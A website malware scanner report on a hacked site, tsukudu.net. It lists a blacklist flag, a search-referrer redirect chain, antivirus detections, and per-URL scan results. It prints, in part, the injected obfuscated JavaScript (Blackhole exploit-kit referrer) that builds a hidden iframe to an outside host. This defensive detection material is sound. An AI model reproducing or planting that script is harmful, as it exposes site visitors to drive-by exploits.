New scan:

Malware Scanner report for tsukudu.net

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "tsukudu.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Suspicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of suspicious redirects found:
->http://bhrigu.advertisewiththedevil.com/www/delivery/spc.php?zones=1%7c12%7c13%7c14%7c15%7c16%7c17%7c18%7c19%7c20%7c21%7c22%7c23%7c24%7c25%7c26%7c27%7c28%7c29%7c30%7c31%7c32%7c33%7c34%7c35%7c36%7c37%7c38%7c39%7c40%7c41%7c42%7c43%7c44%7c45%7c46%7c47%7c48%7c49%7c50%7c51%7c52%7c53%7c54%7c55%7c56%7c57%7c58%7c59%7c60%7c61%7c62%7c63%7c64%7c65%7c66%7c67%7c68%7c69%7c70%7c71%7c72%7c73%7c74%7c75%7c76%7c77%7c78%7c79%7c80%7c81%7c82%7c83%7c84%7c85%7c86%7c87%7c88%7c89%7c90%7c91%7c92%7c93%7c95%7c96%7c97%7c98%7c101%7c102%7c103%7c104%7c105%7c106%7c107%7c108%7c109%7c110%7c111%7c112%7c113%7c114%7c115%7c116%7c117%7c118%7c119%7c120%7c122%7c123%7c124%7c125%7c126%7c127%7c129%7c131%7c132%7c180%7c181%7c182%7c183%7c184%7c185%7c191%7c192%7c193%7c194%7c195%7c196%7c197%7c200%7c201%7c202%7c203%7c221%7c224%7c226&source=&r=78815534&charset=utf-8&loc=http%3a%2f%2ftsukudu.net%2f

->http://www.google.com


The website "tsukudu.net" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tsukudu.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://tsukudu.net/
200 OK
Content-Length: 68061
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String.fromCharCode;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,63,62,6a,5a,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,63,62,6a,5a,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,67,69,66,70,6b,5c,5a,6a,58,25,6
... 3232 bytes are skipped ...
,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1340!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}

Antivirus reports:

AntiVir
JS/BlacoleRef.DD.17
Avast
JS:Decode-AMT [Trj]
Ikarus
Trojan.JS.BlacoleRef
nProtect
Trojan.JS.BlacoleRef.BI
Emsisoft
Trojan.JS.BlacoleRef.BI (B)
Comodo
TrojWare.JS.Agent.NB
CAT-QuickHeal
JS/BlacoleRef.CZB
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.454
Microsoft
Trojan:JS/BlacoleRef.DH
Fortinet
JS/Agent.CBN!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.btugex
AVG
HTML/Framer
GData
JS:Decode-AMT
BitDefender
Trojan.JS.BlacoleRef.BI

http://tsukudu.net/media/system/js/caption.js
200 OK
Content-Length: 1721
Content-Type: application/x-javascript
clean
http://tsukudu.net/plugins/system/rokbox/rokbox.js
200 OK
Content-Length: 22076
Content-Type: application/x-javascript
clean
http://tsukudu.net/plugins/system/rokbox/themes/light/rokbox-config.js
200 OK
Content-Length: 2598
Content-Type: application/x-javascript
clean
http://tsukudu.net/components/com_gantry/admin/widgets/colorchooser/js/mooRainbow.js
200 OK
Content-Length: 14803
Content-Type: application/x-javascript
clean
http://tsukudu.net/components/com_gantry/admin/widgets/slider/js/slider.js
200 OK
Content-Length: 3118
Content-Type: application/x-javascript
clean
http://tsukudu.net/components/com_gantry/admin/widgets/selectbox/js/selectbox.js
200 OK
Content-Length: 3019
Content-Type: application/x-javascript
clean
http://tsukudu.net/templates/rt_crystalline_j15/js/preset-creator.js
200 OK
Content-Length: 11710
Content-Type: application/x-javascript
clean
http://tsukudu.net/components/com_gantry/js/gantry-buildspans.js
200 OK
Content-Length: 797
Content-Type: application/x-javascript
clean
http://tsukudu.net/components/com_gantry/js/gantry-inputs.js
200 OK
Content-Length: 2952
Content-Type: application/x-javascript
clean
http://tsukudu.net/modules/mod_roknavmenu/themes/fusion/js/fusion.js
200 OK
Content-Length: 12721
Content-Type: application/x-javascript
clean
http://tsukudu.net/modules/mod_roktabs/tmpl/roktabs.js
200 OK
Content-Length: 5673
Content-Type: application/x-javascript
clean
http://tsukudu.net/index.php/about
200 OK
Content-Length: 62414
Content-Type: text/html
clean
http://tsukudu.net/index.php/services
200 OK
Content-Length: 59434
Content-Type: text/html
clean
http://tsukudu.net/index.php/clients
200 OK
Content-Length: 61364
Content-Type: text/html
clean

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://tsukudu.net/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: tsukudu.net
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Dec 2014 04:51:47 GMT
Location: http://bhrigu.advertisewiththedevil.com/www/delivery/spc.php?zones=1%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C20%7C21%7C22%7C23%7C24%7C25%7C26%7C27%7C28%7C29%7C30%7C31%7C32%7C33%7C34%7C35%7C36%7C37%7C38%7C39%7C40%7C41%7C42%7C43%7C44%7C45%7C46%7C47%7C48%7C49%7C50%7C51%7C52%7C53%7C54%7C55%7C56%7C57%7C58%7C59%7C60%7C61%7C62%7C63%7C64%7C65%7C66%7C67%7C68%7C69%7C70%7C71%7C72%7C73%7C74%7C75%7C76%7C77%7C78%7C79%7C80%7C81%7C82%7C83%7C84%7C85%7C86%7C87%7C88%7C89%7C90%7C91%7C92%7C93%7C95%7C96%7C97%7C98%7C101%7C102%7C103%7C104%7C105%7C106%7C107%7C108%7C109%7C110%7C111%7C112%7C113%7C114%7C115%7C116%7C117%7C118%7C119%7C120%7C122%7C123%7C124%7C125%7C126%7C127%7C129%7C131%7C132%7C180%7C181%7C182%7C183%7C184%7C185%7C191%7C192%7C193%7C194%7C195%7C196%7C197%7C200%7C201%7C202%7C203%7C221%7C224%7C226&source=&r=78815534&charset=UTF-8&loc=http%3A%2F%2Ftsukudu.net%2F
Server: Apache
Content-Length: 1057
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: ZhL=47; path=/; domain=tsukudu.net; expires=Fri, 02-Jan-2015 09:59:47 GMT
suspicious
URL: http://bhrigu.advertisewiththedevil.com/www/delivery/spc.php?zones=1%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C20%7C21%7C22%7C23%7C24%7C25%7C26%7C27%7C28%7C29%7C30%7C31%7C32%7C33%7C34%7C35%7C36%7C37%7C38%7C39%7C40%7C41%7C42%7C43%7C44%7C45%7C46%7C47%7C48%7C49%7C50%7C51%7C52%7C53%7C54%7C55%7C56%7C57%7C58%7C59%7C60%7C61%7C62%7C63%7C64%7C65%7C66%7C67%7C68%7C69%7C70%7C71%7C72%7C73%7C74%7C75%7C76%7C77%7C78%7C79%7C80%7C81%7C82%7C83%7C84%7C85%7C86%7C87%7C88%7C89%7C90%7C91%7C92%7C93%7C95%7C96%7C97%7C98%7C101%7C102%7C103%7C104%7C105%7C106%7C107%7C108%7C109%7C110%7C111%7C112%7C113%7C114%7C115%7C116%7C117%7C118%7C119%7C120%7C122%7C123%7C124%7C125%7C126%7C127%7C129%7C131%7C132%7C180%7C181%7C182%7C183%7C184%7C185%7C191%7C192%7C193%7C194%7C195%7C196%7C197%7C200%7C201%7C202%7C203%7C221%7C224%7C226&source=&r=78815534&charset=UTF-8&loc=http%3A%2F%2Ftsukudu.net%2F
(imitation of visitor from search engine)


GET /www/delivery/spc.php?zones=1%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C20%7C21%7C22%7C23%7C24%7C25%7C26%7C27%7C28%7C29%7C30%7C31%7C32%7C33%7C34%7C35%7C36%7C37%7C38%7C39%7C40%7C41%7C42%7C43%7C44%7C45%7C46%7C47%7C48%7C49%7C50%7C51%7C52%7C53%7C54%7C55%7C56%7C57%7C58%7C59%7C60%7C61%7C62%7C63%7C64%7C65%7C66%7C67%7C68%7C69%7C70%7C71%7C72%7C73%7C74%7C75%7C76%7C77%7C78%7C79%7C80%7C81%7C82%7C83%7C84%7C85%7C86%7C87%7C88%7C89%7C90%7C91%7C92%7C93%7C95%7C96%7C97%7C98%7C101%7C102%7C103%7C104%7C105%7C106%7C107%7C108%7C109%7C110%7C111%7C112%7C113%7C114%7C115%7C116%7C117%7C118%7C119%7C120%7C122%7C123%7C124%7C125%7C126%7C127%7C129%7C131%7C132%7C180%7C181%7C182%7C183%7C184%7C185%7C191%7C192%7C193%7C194%7C195%7C196%7C197%7C200%7C201%7C202%7C203%7C221%7C224%7C226&source=&r=78815534&charset=UTF-8&loc=http%3A%2F%2Ftsukudu.net%2F HTTP/1.1
Host: bhrigu.advertisewiththedevil.com
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 26 Dec 2014 05:04:25 GMT
Location: http://www.google.com
Server: nginx/1.4.5
Content-Length: 160
Content-Type: text/html
suspicious